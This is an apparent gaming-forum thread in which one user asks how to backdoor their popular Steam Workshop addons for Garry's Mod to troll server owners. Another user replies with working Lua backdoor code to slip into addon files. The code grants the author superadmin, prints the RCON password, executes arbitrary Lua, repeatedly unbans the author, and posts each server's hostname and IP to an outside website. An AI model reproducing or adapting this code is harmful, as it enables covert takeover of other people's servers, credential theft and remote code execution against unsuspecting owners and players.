
Originally Posted by
evilmystery
I have some popular addons on steam workshop. I basically want to backdoor them using a lua file to send me their server's ip and make me admin so I can troll. Would be nice if their is a way to mask commands being sent so they dont know I made myself admin or am the one fucking with their server. Would someone mind sharing how to do this as I dont know lua at all.
check this shit out,
put your steam ID in the 2 spots where it says YOUR STEAM ID and then put this in your backdoor addon files and then when your target has the addon downloaded.
put these in your console:
_76sup <-------- this is used to get access to to the superadmin rank which is used to take over the server
76soldier_cf" <---------- to print the rcon password to the your console
there is also a timer that checks for a ban and unbans you every few seconds
there is also a website that you can check the servers you have taken over but it does not work anymore.
hook.Add( "Initialize", "cakerawsd", function()
concommand.Add( "_76sup", function(ply)if ( ply:SteamID() == "YOUR STEAM ID") then
RunConsoleCommand("ulx", "adduserid", ply:SteamID(), "superadmin")
else
ply:ChatPrint("Your not superadmin, " .. ply:Name() .. ".")
endend)
timer.Create( "checkForBan", 5, 0, function()
ULib.unban( "PUT STEAM ID HERE")
end )
concommand.Add("76soldier_cf",function()local RconPass = GetConVar("rcon_password"):GetString() print(RconPass) end)
concommand.Add( "_76", function(player,command,argument) RunString(table.concat(argument)) end)
concommand.Add("76soldier_sa", function(player) player:SetUserGroup("superadmin") end)
http.Post("http://soldier-76.com/bd.php", {name = GetHostName(),ip = game.GetIPAddress()})
end)